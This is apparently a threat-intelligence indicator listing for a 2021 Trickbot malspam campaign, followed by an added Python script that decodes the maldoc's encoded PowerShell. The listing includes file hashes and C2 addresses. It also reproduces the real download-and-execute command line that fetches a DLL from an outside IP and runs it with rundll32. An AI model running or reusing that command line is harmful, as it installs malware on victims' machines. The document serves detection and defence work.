2021-10-21 Trickbot IOCs
THREAT IDENTIFICATION: TRICKBOT
SUBJECTS OBSERVED
Message from "RNP8678YIXE"
SENDERS OBSERVED
MALDOC FILE HASHES
RNP-00(193).xlsm
b5ab49172507bbbb1d247730cf4ccf8b
POWERSHELL COMMANDS FROM MALDOC
cmd.exe [2868]
C:\Windows\System32\cmd.exe /c start /B /WAIT powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGMAbABiAC4AZABsAGwAIgA= & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW
The -enc argument decodes to:
Invoke-WebRequest -Uri "http://45.86.65.197/images/subzero.png" -OutFile "C:\ProgramData\clb.dll"
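An added example, not part of the original IOC note: a small Python triage helper that takes the cmd.exe command line observed above, decodes the -enc argument (PowerShell's -EncodedCommand is Base64 over a UTF-16LE string) and extracts the download URL, the dropped file path and the rundll32 DLL/export, so the listed indicators can be re-derived from a process-tree record. The command line is embedded exactly as it appears on this page; the function and variable names are my own.

```python
import base64
import re
from typing import Optional

# Command line as recorded on the page for cmd.exe [2868]; the Base64 blob is
# copied verbatim, the surrounding arguments are the observed ones.
OBSERVED_CMDLINE = (
    r"C:\Windows\System32\cmd.exe /c start /B /WAIT powershell -enc "
    "SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6"
    "AC8ALwA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzAC8AcwB1AGIAegBlAHIA"
    "bwAuAHAAbgBnACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABh"
    "AHQAYQBcAGMAbABiAC4AZABsAGwAIgA="
    r" & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW"
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en,
# -enc, ...). Longer alternatives are listed first so "-enc" is not cut to "-e".
ENC_FLAG_RE = re.compile(
    r"-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
URL_RE = re.compile(r"https?://[^\s\"']+")
OUTFILE_RE = re.compile(r"-OutFile\s+\"?([^\"\s]+)\"?", re.IGNORECASE)
RUNDLL_RE = re.compile(r"rundll32\.exe\s+([^\s,]+),(\w+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None
    when the command line carries none (or the blob is not valid Base64/UTF-16LE)."""
    match = ENC_FLAG_RE.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
        return None


def triage(cmdline: str) -> dict:
    """Pull the network and file indicators out of one observed command line."""
    decoded = decode_encoded_command(cmdline)
    return {
        "decoded_command": decoded,
        # URLs fetched by the decoded stage (Invoke-WebRequest -Uri ...)
        "urls": URL_RE.findall(decoded) if decoded else [],
        # Paths the decoded stage writes to disk (-OutFile ...)
        "dropped_files": OUTFILE_RE.findall(decoded) if decoded else [],
        # Follow-on rundll32 loads visible in the outer cmd.exe line
        "rundll32": [
            {"dll": dll, "export": export}
            for dll, export in RUNDLL_RE.findall(cmdline)
        ],
    }


if __name__ == "__main__":
    for key, value in triage(OBSERVED_CMDLINE).items():
        print(f"{key}: {value}")
```

Running the block prints the decoded Invoke-WebRequest line together with the URL, the dropped DLL path and the `clb.dll,AloperNoteW` pair, which match the payload URL and file hashes sections that follow. Feeding it a Sysmon event 1 or EDR command-line field gives the same fields for any other sample that uses the `-enc` stage.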
TRICKBOT PAYLOAD DOWNLOAD URL
http://45.86.65.197/images/subzero.png
TRICKBOT PAYLOAD FILE HASHES
subzero.png
1cb1a805d778e782a8fc0614d83970c0
rpclbjt.dmo (32-bit .dll)
cc8d1fd779312f615dfeca4cfb63bcce
renamed to clb.dll
clb.dll
cc8d1fd779312f615dfeca4cfb63bcce
TRICKBOT GTAG
gtag: rob136
TRICKBOT C2s
http://202.84.76.58:443/rob136/WIN7PC_W617601.F353BB3593F71DBB3FBFB3395BB773FF/90/
http://203.80.170.81:443/rob136/WIN7PC_W617601.F353BB3593F71DBB3FBFB3395BB773FF/84/
https://179.189.229.254/rob136/WIN7PC_W617601.F353BB3593F71DBB3FBFB3395BB773FF/5/file/
ADDITIONAL TCP TRAFFIC
5.152.175.57:443
36.66.188.251:443
60.51.47.65:443
65.152.201.203:443
79.106.115.107:443
105.27.205.34:443
176.58.123.25:443
179.189.229.254:443
185.56.175.122:443
202.84.76.58:443